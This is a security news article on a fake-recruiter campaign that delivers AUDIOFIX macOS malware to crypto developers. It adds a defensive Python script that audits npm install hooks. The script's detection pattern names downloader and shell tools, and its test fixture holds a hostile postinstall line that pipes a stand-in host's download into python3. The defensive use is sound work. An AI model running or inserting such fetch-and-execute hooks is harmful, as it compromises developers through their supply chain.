Cybersecurity researchers say they have uncovered a sophisticated campaign that targets cryptocurrency organizations and software developers through fake recruiter personas and custom macOS malware.
The threat actor, tracked as JINX-0164, is reportedly operating LinkedIn profiles that pose as recruiters and contacting developers and employees of crypto-focused organizations. Victims are then drawn into supposed virtual interviews or technical chats hosted on teleconferencing sites built to look legitimate.
During these sessions, targets are coaxed into downloading what they are told is a required meeting tool or a "software fix". The download instead drops a Python-based macOS malware strain named AUDIOFIX, which functions as both an infostealer and a remote access trojan.
Researchers note that AUDIOFIX can harvest browser credentials, SSH keys, password-manager data, cryptocurrency wallet information, iCloud Keychain files, and active sessions from Slack, Discord, and Telegram. It also lets the attackers run shell commands remotely, fetch additional payloads, and move laterally across internal development environments.
One of the more concerning elements is the focus on software supply chain compromise. Investigators say they found signs that, after gaining a foothold on employee devices, the attackers attempted to inject malicious code into internal code distribution systems and development environments.
The actor has also been tied to a backdoor called MiniRAT, previously seen in a compromised npm package associated with a decentralized finance toolkit. That malware was built to execute commands, upload files, and download further payloads onto infected macOS machines, giving the attackers persistent control.
Researchers have noted similarities between this campaign and techniques previously attributed to North Korean groups targeting cryptocurrency firms. So far, however, no direct infrastructure overlap has been confirmed.
The campaign shows how targeted and professional social engineering has become, with particular attention to developers and staff who hold access to financial systems, source code, and cryptocurrency-related infrastructure.
Security experts recommend several practical measures: verify recruiter identities through an independent channel, refuse to download software from unfamiliar meeting platforms, harden developer environments, and monitor for anomalous behavior across CI/CD pipelines and internal repositories.
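One concrete hardening step that addresses the npm-package vector described above is to audit a dependency tree for packages that run code at install time, since a lifecycle hook is the usual place a backdoor is wired in. The script below is an added example written for this article, not code from the researchers or from any project named here; the package names and hook commands in its fixture are constructed, and `example.invalid` is a reserved non-resolving domain.

```python
"""Audit an npm node_modules tree for install-time lifecycle hooks.

Added example, not from the article's researchers or any named project.
It walks a node_modules directory, reads each package's package.json and
reports every package that declares a preinstall/install/postinstall/prepare
hook, flagging hooks that invoke a downloader or interpreter, which is the
shape a dropped backdoor's installer typically takes.
"""
import json
import os
import re
import tempfile

# npm lifecycle scripts that execute during `npm install`.
HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands that legitimately appear in very few library install hooks.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|python3?|bash -c|sh -c|eval|base64|osascript)\b"
)


def audit_node_modules(root):
    """Return a list of findings, one per (package, hook) pair found under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        manifest = os.path.join(dirpath, "package.json")
        try:
            with open(manifest, encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, not fatal
        scripts = pkg.get("scripts") or {}
        for hook in HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            findings.append({
                "package": pkg.get("name", os.path.relpath(dirpath, root)),
                "version": pkg.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "suspicious": bool(SUSPICIOUS.search(cmd)),
            })
    return findings


def build_sample_tree():
    """Constructed fixture (hypothetical package names) written to a temp dir.

    One package has no hooks, one has a plausible native build hook, and one
    pipes a download straight into an interpreter at postinstall time.
    """
    root = tempfile.mkdtemp(prefix="nm_audit_")
    packages = {
        "tiny-pad": {"name": "tiny-pad", "version": "1.0.0"},
        "native-addon": {
            "name": "native-addon", "version": "2.1.0",
            "scripts": {"install": "node-gyp rebuild"},
        },
        "defi-helper": {
            "name": "defi-helper", "version": "0.3.7",
            "scripts": {"postinstall": "curl -s https://example.invalid/x | python3 -"},
        },
    }
    for dirname, manifest in packages.items():
        pkg_dir = os.path.join(root, dirname)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


def suspicious_packages(findings):
    """Names of packages whose hooks matched the SUSPICIOUS pattern."""
    return sorted({f["package"] for f in findings if f["suspicious"]})


if __name__ == "__main__":
    tree = build_sample_tree()
    for f in audit_node_modules(tree):
        flag = "SUSPICIOUS" if f["suspicious"] else "hook"
        print(f"{flag:10} {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

Run it against a real checkout with `audit_node_modules("node_modules")`. The blanket control is to stop hooks running at all with `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) and then use this audit to find the few packages that genuinely need a build step, so those can be reviewed and allow-listed individually rather than trusting every install hook in the tree.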
Organizations focused on cybersecurity, such as IntelligenceX, continue to stress the importance of developer security, software supply chain protection, and proactive monitoring as cryptocurrency-focused attacks grow more mature and more financially motivated.